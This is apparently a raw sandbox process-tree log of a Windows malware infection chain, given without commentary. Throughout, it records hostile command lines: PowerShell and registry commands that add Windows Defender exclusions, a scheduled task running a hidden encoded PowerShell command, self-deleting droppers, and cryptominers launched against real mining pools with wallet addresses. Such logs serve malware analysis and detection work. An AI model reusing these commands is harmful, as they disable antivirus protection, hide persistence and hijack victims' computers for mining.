C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe9⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tvxfio3a.wzx\GcleanerWW.exe /mixone & exit7⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exe /8-2222 & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exeC:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exe /8-22228⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Polished-Lake"9⤵
-
-
C:\Program Files (x86)\Polished-Lake\7za.exe"C:\Program Files (x86)\Polished-Lake\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Polished-Lake\setup.exe" -map "C:\Program Files (x86)\Polished-Lake\WinmonProcessMonitor.sys""9⤵
-
C:\Program Files (x86)\Polished-Lake\setup.exe"C:\Program Files (x86)\Polished-Lake\setup.exe" -map "C:\Program Files (x86)\Polished-Lake\WinmonProcessMonitor.sys"10⤵
-
-
-
C:\Program Files (x86)\Polished-Lake\7za.exe"C:\Program Files (x86)\Polished-Lake\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
-
C:\Program Files (x86)\Polished-Lake\setup.exe"C:\Program Files (x86)\Polished-Lake\setup.exe" /8-22229⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exe8⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exeC:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 1 3.1616622220.605bb28c04114 10111⤵
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 2 3.1616622220.605bb28c0411412⤵
-
C:\Users\Admin\AppData\Local\Temp\kn0wsiy5eav\app.exe"C:\Users\Admin\AppData\Local\Temp\kn0wsiy5eav\app.exe" /8-2313⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Rough-Sun"14⤵
-
-
C:\Program Files (x86)\Rough-Sun\7za.exe"C:\Program Files (x86)\Rough-Sun\7za.exe" e -p154.61.71.13 winamp-plugins.7z14⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Rough-Sun\app.exe" -map "C:\Program Files (x86)\Rough-Sun\WinmonProcessMonitor.sys""14⤵
-
C:\Program Files (x86)\Rough-Sun\app.exe"C:\Program Files (x86)\Rough-Sun\app.exe" -map "C:\Program Files (x86)\Rough-Sun\WinmonProcessMonitor.sys"15⤵
-
-
-
C:\Program Files (x86)\Rough-Sun\7za.exe"C:\Program Files (x86)\Rough-Sun\7za.exe" e -p154.61.71.13 winamp.7z14⤵
-
-
C:\Program Files (x86)\Rough-Sun\app.exe"C:\Program Files (x86)\Rough-Sun\app.exe" /8-2314⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe"C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe" /VERYSILENT /id=53513⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ISOFR.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-ISOFR.tmp\vict.tmp" /SL5="$D025E,870426,780800,C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe" /VERYSILENT /id=53514⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0DCGU.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-0DCGU.tmp\winhost.exe" 53515⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe"C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe" /ustwo INSTALL13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "abtdeg4m0i4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "abtdeg4m0i4.exe" /f15⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe" /Verysilent /subid=57713⤵
-
-
C:\Users\Admin\AppData\Local\Temp\qqsvxwrc52b\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\qqsvxwrc52b\AwesomePoolU1.exe"13⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe"C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe" ll10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TP9UK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TP9UK.tmp\setups.tmp" /SL5="$5056A,250374,58368,C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe" ll11⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"11⤵
-
-
-
C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK12⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2d7f8dff..exe"C:\Users\Admin\AppData\Local\Temp\2d7f8dff..exe"10⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exeC:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe"C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe" ll9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UV7F1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UV7F1.tmp\setups.tmp" /SL5="$205E0,250374,58368,C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe" ll10⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 1 3.1616622219.605bb28b70bc7 10410⤵
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 2 3.1616622219.605bb28b70bc711⤵
-
C:\Users\Admin\AppData\Local\Temp\ot0bclewyyx\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\ot0bclewyyx\AwesomePoolU1.exe"12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe" /Verysilent /subid=57712⤵
-
C:\Users\Admin\AppData\Local\Temp\is-48SGL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-48SGL.tmp\Setup3310.tmp" /SL5="$804C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe" /Verysilent /subid=57713⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R636O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R636O.tmp\Setup.exe" /Verysilent14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r5uuflttixy\app.exe"C:\Users\Admin\AppData\Local\Temp\r5uuflttixy\app.exe" /8-2312⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Solitary-Surf"13⤵
-
-
C:\Program Files (x86)\Solitary-Surf\7za.exe"C:\Program Files (x86)\Solitary-Surf\7za.exe" e -p154.61.71.13 winamp-plugins.7z13⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Solitary-Surf\app.exe" -map "C:\Program Files (x86)\Solitary-Surf\WinmonProcessMonitor.sys""13⤵
-
C:\Program Files (x86)\Solitary-Surf\app.exe"C:\Program Files (x86)\Solitary-Surf\app.exe" -map "C:\Program Files (x86)\Solitary-Surf\WinmonProcessMonitor.sys"14⤵
-
-
-
C:\Program Files (x86)\Solitary-Surf\7za.exe"C:\Program Files (x86)\Solitary-Surf\7za.exe" e -p154.61.71.13 winamp.7z13⤵
-
-
C:\Program Files (x86)\Solitary-Surf\app.exe"C:\Program Files (x86)\Solitary-Surf\app.exe" /8-2313⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe"C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe" /VERYSILENT /id=53512⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IM8S1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IM8S1.tmp\vict.tmp" /SL5="$A0296,870426,780800,C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe" /VERYSILENT /id=53513⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JO6E8.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-JO6E8.tmp\winhost.exe" 53514⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe"C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe" /ustwo INSTALL12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "drwtewo44su.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "drwtewo44su.exe" /f14⤵
- Kills process with taskkill
-
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exe /S /kr /site_id=754 & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exeC:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exe /S /kr /site_id=7548⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHKgRPKPs" /SC once /ST 04:53:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHKgRPKPs"9⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHKgRPKPs"9⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exe\" 9n /site_id 754 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bmIXAqnwlcZKDlfrrr"9⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1a-77187-771-bdb98-dfd0aeff57cd2\Xelagufufy.exe"C:\Users\Admin\AppData\Local\Temp\1a-77187-771-bdb98-dfd0aeff57cd2\Xelagufufy.exe"6⤵
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"3⤵
-
C:\Users\Admin\Documents\FXCyPNrtyMWYAzNFectkPCcj.exe"C:\Users\Admin\Documents\FXCyPNrtyMWYAzNFectkPCcj.exe"4⤵
-
C:\Users\Admin\Documents\h05Rnb4jQHmLoxd21uOnoFgP.exe"C:\Users\Admin\Documents\h05Rnb4jQHmLoxd21uOnoFgP.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe7⤵
-
-
-
-
C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"5⤵
-
C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"6⤵
-
-
-
C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe"C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 26453032185.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 26453032185.exe /f9⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe" /mix6⤵
-
C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe"C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe" /mix7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\uNuniNTUIop & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\Joirk.exe"C:\Users\Admin\AppData\Local\Temp\Joirk.exe"8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "TpPta2e3M4dm9YJkW8O1GP75.exe" /f & erase "C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "TpPta2e3M4dm9YJkW8O1GP75.exe" /f7⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"5⤵
-
C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"6⤵
-
-
-
C:\Users\Admin\Documents\BybTygK2T5m3w1Ww9kxGM6nk.exe"C:\Users\Admin\Documents\BybTygK2T5m3w1Ww9kxGM6nk.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe7⤵
-
-
-
-
C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe"C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 26262922459.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 26262922459.exe /f9⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe" /mix6⤵
-
C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe"C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe" /mix7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "T1hYfv6FL1x6XAY2y4CkL00k.exe" /f & erase "C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "T1hYfv6FL1x6XAY2y4CkL00k.exe" /f7⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth5⤵
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"3⤵
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 70B38B667EBB362A25755E653E1FABC0 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D539FC523B9B88EAB570F59DCC7F102B2⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
